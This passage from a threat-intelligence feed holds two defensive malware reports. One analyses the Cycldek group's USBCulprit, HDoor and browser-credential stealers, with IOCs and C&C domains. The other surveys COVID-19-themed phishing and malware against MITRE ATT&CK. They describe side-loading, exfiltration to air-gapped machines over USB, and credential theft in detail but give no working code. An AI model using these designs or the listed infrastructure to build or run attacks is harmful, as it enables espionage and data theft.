single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both groups. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix. All in all, this suggests the entities operating behind those clusters are sharing multiple resources \u2013 both code and infrastructure \u2013 and operating under a single organizational umbrella.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)\n\n_**_Figure 6_: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.** _\n\n## Info stealing and lateral movement toolset\n\nDuring the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used for either lateral movement in the compromised networks or information stealing from infected nodes. There were several types of these tools \u2013 some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.\n\nAs in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Updates (googleupdate.exe). These tools could be used in order to bypass weak security mechanisms like application whitelisting, grant the malware additional permissions during execution or complicate incident response.\n\nAs already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLbins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities. Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (Sysinternals tools used to dump memory, possibly to obtain passwords from running processes), Nbtscan (command line utility intended to scan IP networks for NetBIOS information) and PsExec (Sysinternals tools used to execute commands remotely in the network, typically used for lateral movement).\n\nThe rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:\n\n * **Custom HDoor: **an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>) that made use of the original tool. \nThe custom version used by Cycldek uses a small subset of the features and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts accessible through the local network but not connected to the internet.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)\n\n_**_Figure 7_: Command line usage of the custom HDoor tool.** _\n\n * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers. For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing stolen cookie info. Entries in the file resemble this one:\n \n \n {\n \"domain\": \".google.com\",\n \"id\": 1,\n \"name\": \"NID\",\n \"path\": \"/\",\n \"value\": \"%VALUE%\"\n }\n\n * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)\n\n**__Figure 8_: Command line usage of the ChromePass tool._**\n\n#### \n\n## Formerly Unreported Malware: USBCulprit\n\nOne of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulrpit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.\n\nDuring the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated to samples detected after 2017 is the capability to execute files with a given name from a connected USB. This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.\n\nAnother change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.\n\nThis loading scheme demonstrates that the actor behind it makes use of similar TTPs seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro) forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)\n\n**__Figure 9_: USBCulprit's loading flow, as observed in samples after 2017._**\n\nOnce USBCulprit is loaded to memory and executed, it operates in three phases:\n\n * **Boostrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and verify that hidden files are not shown to the user. It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware.Additionally, the malware makes a single scan to collect files it intends to steal using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with either one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000' corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched locally. If it exists, the malware would expect to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n**__Figure 10_: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n**__Figure 11_: Commands used to profile the network connectivity of the compromised host._**\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it's worth noting that we noted multiple points where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased \u2013 it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 Chromepass \n1EA07468EBDFD3D9EEC59AC57A490701 Chromepass \n07EE1B99660C8CD5207E128F44AA8CBC JsonCookies \n809196A64CA4A32860D28760267A1A8B Custom HDoor \n81660985276CF9B6D979753B6E581D34 Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 Custom HDoor\n\n \n\n**USBCulprit: **\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 USBCulrprit Payload\n\n \n\n**Toolset overlapping in both clusters:**\n\n**Common Name ** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description** \n---|---|---|---|--- \nchromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080\n\n | http://news.trungtamwtoa.com:88 | ChromePass \ngoopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443\n\nhttp://hcm.vietbaonam.com:443 | USBCulprit \n2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080\n\nttp://tinmoi.thoitietdulich.com:443\n\nhttp://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53\n\nhttp://tinmoi.vieclamthemde.com | USBCulprit \nqclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com\n\nhttp://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL \nsilverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443\n\nhttp://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53\n\nhttp://info.coreders.com:8080 | Custom HDoor \n \n \n\n**C&Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster\n\nhttp://tinmoi.vieclamthemde[.]com - Red Cluster\n\nhttp://kinhte.chototem[.]com - Red Cluster\n\nhttp://news.trungtamwtoa[.]com - Red Cluster\n\nhttp://mychau.dongnain[.]com - Red Cluster\n\nhttp://hcm.vietbaonam[.]com - Red Cluster\n\nhttp://login.thanhnienthegioi[.]com - Red Cluster\n\nhttp://103.253.25.73 - Red Cluster\n\nhttp://luan.conglyan[.]com - Red Cluster\n\nhttp://toiyeuvn.dongaruou[.]com - Red Cluster\n\nhttp://tintuc.daikynguyen21[.]com - Red Cluster\n\nhttp://web.laomoodwin[.]com - Red Cluster\n\nhttp://login.giaoxuchuson[.]com - Red Cluster\n\nhttp://lat.conglyan[.]com - Red Cluster\n\nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster\n\nhttp://laovoanew[.]com - Red Cluster\n\nhttp://cdn.laokpl[.]com - Red Cluster\n\nhttp://login.dangquanwatch[.]com - Blue Cluster\n\nhttp://info.coreders[.]com - Blue Cluster\n\nhttp://thanhnien.vietnannnet[.]com - Blue Cluster\n\nhttp://login.diendanlichsu[.]com - Blue Cluster\n\nhttp://login.vietnamfar[.]com - Blue Cluster\n\nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster\n\nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster\n\nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster\n\nhttp://khinhte.chinhsech[.]com - Blue Cluster\n\nhttp://images.webprogobest[.]com - Blue Cluster\n\nhttp://web.hcmuafgh[.]com - Blue Cluster\n\nhttp://news.cooodkord[.]com - Blue Cluster\n\nhttp://24h.tinthethaoi[.]com - Blue Cluster\n\nhttp://quocphong.ministop14[.]com - Blue Cluster\n\nhttp://nhantai.xmeyeugh[.]com - Blue Cluster\n\nhttp://thoitiet.yrindovn[.]com - Blue Cluster\n\nhttp://hanghoa.trenduang[.]com - Blue Cluster", "cvss3": {}, "published": "2020-06-03T10:00:32", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "carbonblack": [{"lastseen": "2020-03-19T21:36:32", "description": "The global COVID-19 pandemic is generating a substantial uptick in the production and delivery of Coronavirus themed malware. Due to a rapidly growing number of Indicators of Compromise (IOC)\u2019s, this report covers the key behaviors by aligning to the MITRE ATT&CK Framework. \n\n[_MITRE ATT&CK_](<https://attack.mitre.org/>)_ launched in 2018 is a security framework that describes the various stages through which an attack will generally progress. The intent of the framework is to provide \u201cbetter detection of post-compromise cyber adversary behavior\u201d_. _This framework is gaining increased adoption in the security community and VMware Carbon Black actively maps our products to this framework to provide added context for our customers._\n\nPhishing emails are the primary source, which in turn manifest into harmful threats that include malicious attachments that deliver payloads to infect victim machines. Some recently observed payloads are delivering trojans, backdoors, remote access trojan (RAT) functionality, cryptominers and botnet participation. In one variant that was analyzed, the malware was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. Malicious functionality has also been observed in fake mobile apps, fake Coronavirus maps and fake VPN software. These recent observations show an increased overall risk to corporate as well as personal security, at a time where many countries and corporations are enforcing remote working. \n\n## **Background**\n\nThe COVID-19 global pandemic has created an unprecedented situation with far-reaching impacts on our daily lives. Many countries have encouraged or mandated social isolation, including working remotely, in an effort to contain the spread of the virus. Much is still unknown leading to a climate of uncertainty. Unfortunately during times of uncertainty and doubt, threat actors are ready to take advantage of the widespread desire to be informed. This is already happening with the Coronavirus. People and businesses who are already in a heightened state of emotion, and on overload with changes in all aspects of their lives, are now at risk from bad actors intent on stealing PII, sensitive information, payment details and more, simply by using luring tactics that feature Coronavirus themed malware. \n\nWhile this technique isn\u2019t new, history has proven that cyber crime often increases during times of heightened emotion, distraction and stress, such as certain religious or [festive](<https://www.bleepingcomputer.com/news/security/emotet-trojan-is-inviting-you-to-a-malicious-christmas-party/>) holidays, [elections](<https://www.darkreading.com/attacks-breaches/trump-themed-malware-dominating-threat-campaigns-this-election-season/d/d-id/1327211>), and even [Black Friday](<https://www.infosecurity-magazine.com/news/fake-black-friday-apps-cause/>) sales events. The actors exploit these challenging times to find avenues for distributing their malware. \n\nThis article aims to increase awareness of recently observed threats that are leveraging the COVID-19 pandemic by describing current examples in alignment with the MITRE ATT&CK Framework. MITRE ATT&CK has had a major impact on the cybersecurity industry due to its rapid adoption in the security community. Aligning to the MITRE ATT&CK Framework is important as there is a growing number of IOC\u2019s being produced daily. HIstorically, such as in the case of Emotet, handling such large volumes of IOC\u2019s can become overwhelming for defenders. Understanding the behavioral patterns of the different types of threats allows for easier interpretation and proactive defense. \n\nThe intent is to raise awareness for customers, SOC teams, IR partners, MSSPs and all defenders out in the InfoSec community, and to aid them with detection, protection and response of such malware we will be examining the types of attacks that appear to be most common.\n\nFor further information and resources pertaining to COVID-19, please refer to the VMware Carbon Black COVID-19: [Cybersecurity Community Resources](<https://www.carbonblack.com/2020/03/17/covid-19-cybersecurity-community-resources/>) page. \n\n## **Technical Analysis**\n\nIn the following section we will focus on the first two phases of the MITRE ATT&CK framework: **Initial Access** and **Execution**. We focus on these phases because we have observed the largest overlap from multiple actors that we are tracking. VMware Carbon Black\u2019s Threat Analysis Unit will continue to follow up with detailed analysis of individual actors and campaigns, digging deeper into the later stages of the attack.\n\nBefore we introduce these two tactic categories we would like to specifically highlight one of the most frequently leveraged techniques. [Masquerading (T1036)](<https://attack.mitre.org/techniques/T1036/>) occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. It is one of the key techniques employed in many of the observed threat types. While this may not come as a surprise, educating your end users, family and friends should be a priority during this unsettling time. Similar to campaigns that target religious or festive holidays, masquerading is the perfect tactic used by the bad actors, who have no regard for their victims. Their mission is clear, and masquerading helps them to evade defenses and get a few steps closer to achieving their goals. \n\n## **Initial Access **\n\nThis is the first tactic employed by bad actors whose hopes are to compromise as many vulnerable machines as possible. While many people and businesses are trying to share legitimate information related to COVID-19, the sheer volume of information being communicated lends itself to the delivery of fake data sheets, infographics, links to tracking maps, as well as fake software. The intent is to catch the end user off guard in order to deliver the malware. Other tactics could also include [drive-by compromise (T1189)](<https://attack.mitre.org/techniques/T1189/>) or [supply chain compromise (T1195)](<https://attack.mitre.org/techniques/T1195/>). The rationale behind this is due to the rapid registration of coronavirus themed domain names that have appeared on [MalwarePatrol.net](<https://www.malwarepatrol.net/>). The count at the time of writing is currently over 5000 registered domain names. Using Coronavirus or COVID-19 themed domain names could easily trick legitimate users into visiting websites and becoming subject to drive-by or supply chain compromise. The list can be found [here](<https://www.malwarepatrol.net/wp-content/uploads/2020/03/covid-19-domains.txt>). \n\n### [**Spearphishing Attachment - TID:T1193**](<https://attack.mitre.org/techniques/T1193/>)\n\nAttachments are a popular choice for obtaining initial infection. Observed attachment file types include, but are not limited to files with the following extensions: ZIP, 7Z, TAR, RAR, JAR, VBS, IMG, GZ, EXE, ISO, SCR, RTF, PDF, DOC, XLS. Examples of phishing emails may contain spoofed email headers and authentic messaging to lure the victim into a false sense of security. Attachment names observed also include names that are attention grabbing in order to arouse enough curiosity for the end user to feel the need to open it. Phishing emails can contain spelling, grammar or formatting mistakes, as shown in the example below. With that said, more advanced threat actors will be particularly good at producing an authentic looking email message, as we will see later in this report. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/1-Phishing-email-example-1.png>) \n\n\n**Figure 1: Phishing email example containing malicious Word document attachment**\n\nA common technique is to create interesting content for malicious Microsoft Office related email attachments in order to convince the user to click on a link.. This typically will invoke the underlying malicious code embedded within the document, which is usually a malicious MS Office macro using VBA code. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/2-Phishing-email-example-1-Word-macro.png>) \n\n\n**Figure 2: Typical end-user prompt to trigger embedded payload**\n\nIn our next example we see an ISO file included as an attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/3-Phishing-email-example-2.png>) \n\n\n**Figure 3: Phishing email example containing malicious ISO file attachment**\n\nThe ISO attachment contains a SCR file which is actually a PE file. When executed, the PE file deploys RemCos, a prolific RAT which is being continually updated and sold on the Dark Web. The flow diagram shown below shows a visual representation of the underlying effects of opening this particular email attachment. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/4-CBD-Flow-SCR.png>) \n\n\n**Figure 4: Partial process flow diagram taken from VMware Carbon Black Endpoint Standard**\n\nIn the next example, a PDF attachment contains a clickable link which redirects the user to an external site hosting a PHP page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/5-PDF-attachment-example-1.png>) \n\n\n**Figure 5: Example PDF Attachment containing clickable link**\n\nIf the user clicks the link within the PDF, they are presented with a fake Office365 landing page masquerading as a legitimate Office365 page. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/6-PDF-attachment-fake-Office-365-page.png>) \n\n\n**Figure 6: Fake Office365 landing page**\n\nAfter the user clicks on the \u201cdownload file\u201d button, they are presented with a fake Office365 login prompt which harvests any details inputted by the end user. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/7-PDF-attachment-fake-Office-365-creds.png>) \n\n\n**Figure 7: Fake Office365 login prompt**\n\nIn the next example an attachment named **ALL UPDATED INFORMATION FROM CDC ON COVID-19 IN YOUR AREA.7z** contains an executable, which when opened deploys **AgentTesla**. AgentTesla is used by threat actors to record keystrokes and other sensitive information, and to receive them via their C2 channel. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/8-7z-example.png>) \n\n\n**Figure 8: 7z file containing executable**\n\nAnother example uses an attachment name **AWARENESS NOTICE ON CORONAVIRUS COVID-19 DOCUMENT_pdf.exe **which when opened, launches [RegAsm (T1121)](<https://attack.mitre.org/techniques/T1121/>) to deliver **Lokibot**, another popular and highly effective information stealer. This attachment contains an embedded AutoIT script to deliver the main payload. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/9-AutoIT-obfuscated-script.png>) \n\n\n**Figure 9: Snippet of hex dump showing obfuscated AutoIT script embedded in PE file**\n\nAnother attachment named COVID-19.INFO.37842702.doc installs a trojan, by leveraging [PowerShell (T1086)](<https://attack.mitre.org/techniques/T1086/>) and CSCRIPT (a technique used for [signed script proxy execution (T1216)](<https://attack.mitre.org/techniques/T1216/>)) to launch a VBS file which is a common [scripting (T1064)](<https://attack.mitre.org/techniques/T1064/>) technique. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/10-trojan-example.png>) \n\n\n**Figure 10: Execution path displayed within VMware Carbon Black EDR**\n\n## Execution\n\n[User execution (T1204)](<https://attack.mitre.org/techniques/T1204/>) is symptomatic of when an end user opens a phishing email or attachment. There are other specific TTP\u2019s that have been observed with the execution of Coronavirus themed payloads. \n\n### [Powershell (T1086):](<https://attack.mitre.org/techniques/T1086/>)\n\nWhen a particular MS Word document attachment named \u201c**CORONA VIRUS REMEDY ISREAL.doc**\u201d is opened, executed an obfuscated command within a hidden PowerShell window. This in turn invokes two signed Microsoft binaries: **csc.exe** and **cvtres.exe**, which are commonly seen in the defense evasion, [compile after delivery (T1500)](<https://attack.mitre.org/techniques/T1500/>) tactic. These types of behaviours are commonly seen in commodity malware, and are highly effective at delivering and compiling a payload using legitimate Windows binaries. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/11-Powershell-snippet.png>) \n\n\n**Figure 11: Snippet of obfuscated Powershell command**\n\n### [Dynamic Data Exchange (T1173):](<https://attack.mitre.org/techniques/T1173/>)\n\nMalicious MS Office documents still manage to successfully exploit unpatched versions of MS Office due to the typical DDE vulnerabilities. Some of these common CVE\u2019s are: [CVE-2012-0158](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027#mscomctlocx-rce-vulnerability---cve-2012-0158>), [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>) and [CVE-2018-0798](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0798>). \n\nIn a recent Coronavirus themed MS Word document attachment, MS Word is the target for [exploitation for client execution (T1203)](<https://attack.mitre.org/techniques/T1203/>) using DDE exploits to launch the MS Equation Editor. The purpose is to deliver and execute a [signed binary proxy execution (T1218)](<https://attack.mitre.org/techniques/T1218/>), which in this instance was found to overlap with the APT41 (also referred to as WINNTI) threat group which has traditionally been an APT actor based in China. The VMware Carbon Black TAU team is still investigating this particular threat.\n\n## **More on Masquerading**\n\nMasquerading has been highlighted so far in relation to malicious phishing email attachments. Unfortunately third party software is not excluded from this. There is evidence to suggest that the following categories of software are being weaponised in order to target potential victims. \n\n### Fake VPN clients/installers:\n\nA recent [report](<https://www.bleepingcomputer.com/news/security/azorult-malware-infects-victims-via-fake-protonvpn-installer/>) highlights the fact that while many people globally adapt to working from home for the foreseeable future, there is a growing number of fake VPN clients and installers that are disguised as malware. The example discussed in the report delivers the AZORult malware via a fake ProtonVPN client, whereby post-execution the victim machine becomes part of the AZORult botnet. \n\n### Remote meeting software:\n\nTAU are currently monitoring for the appearance of weaponized or fake remote meeting software. TAU are anticipating that there may be an eventual increase over the coming weeks as more people around the world rely on remote working. \n\n### Mobile apps:\n\nAvast have recently [released](<https://www.apklab.io/covid19>) a repository for researchers and defenders due to the growing number of apps that have appeared for Android users. In a recent [report](<https://www.domaintools.com/resources/blog/covidlock-update-coronavirus-ransomware>), a fake Android Coronavirus app was discovered to be delivering ransomware. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/12-fake-mobile-apps.png>) \n\n\n**Figure 12: Snippet showing potential malicious and fake apps**\n\n### Fake Coronavirus maps:\n\nIn a report published recently, a fake Coronavirus map was discovered which silently steals passwords, crypto wallets and other sensitive information. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/13-Coronavirus-map.png>)\n\n**Figure 13: Malicious fake Coronavirus map **\n\n## **Ransomware**\n\n[Data encrypted for impact (T1486)](<https://attack.mitre.org/techniques/T1486/>) is observed with a new family of ransomware known as Coronavirus which was recently [reported](<https://www.bleepingcomputer.com/news/security/new-coronavirus-ransomware-acts-as-cover-for-kpot-infostealer/>). TAU has observed an upwards trend in ransomware for some time now, but sadly there has never been a better time for the threat actors to create and distribute ransomware. Ransomware is an ongoing and continual threat which TAU observes very closely. A full write up will be published soon on this new ransomware campaign. \n\n[](<https://cdn.www.carbonblack.com/wp-content/uploads/2020/03/14-Coronavirus-ransomware.png>) \n\n\n**Figure 14: Coronavirus ransomware message**\n\n## **Summary**\n\nThe threats that we are seeing that leverage the COVID-19 pandemic are varied, but primarily familiar. The key here is that the uncertainty and thirst for knowledge about the global pandemic, coupled with the response of working remotely, create new opportunities for exploitation. It may seem obvious, but masquerading and user execution are the two behaviors seen across most of the recently observed threats. While some public lists containing IOC\u2019s do exist, the current global situation could result in a significant increase in cyber attacks. The jump in IOC\u2019s may shortly become unmanageable. Understanding the behaviors, and leveraging the MITRE ATT&CK Framework will help to detect and mitigate such threats. While Coronavirus themed malware includes a variety or different threats,many of the techniques are seen with regular commodity based malware. As ever, a layered approach should be taken to reduce the risk of such threats. Defenders should be extra vigilant in not only staying up to date with future Coronavirus related threats, but also advising their family, friends and colleagues of such threats. \n\n## **Indicators of Compromise (IOC\u2019s)**\n\nPlease refer to the VMware Carbon Black TAU [Github](<https://github.com/carbonblack/tau-tools/tree/master/threat_hunting/IOCs/COVID-19%20Post%20IOCs>) page for a list of IOC\u2019s.\n\nThe post [Technical Analysis: Hackers Leveraging COVID-19 Pandemic to Launch Phishing Attacks, Fake Apps/Maps, Trojans, Backdoors, Cryptominers, Botnets & Ransomware](<https://www.carbonblack.com/2020/03/19/technical-analysis-hackers-leveraging-covid-19-pandemic-to-launch-phishing-attacks-trojans-backdoors-cryptominers-botnets-ransomware/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "edition": 2, "cvss3": {}, "published": "2020-03-19T20:48:06", "type": 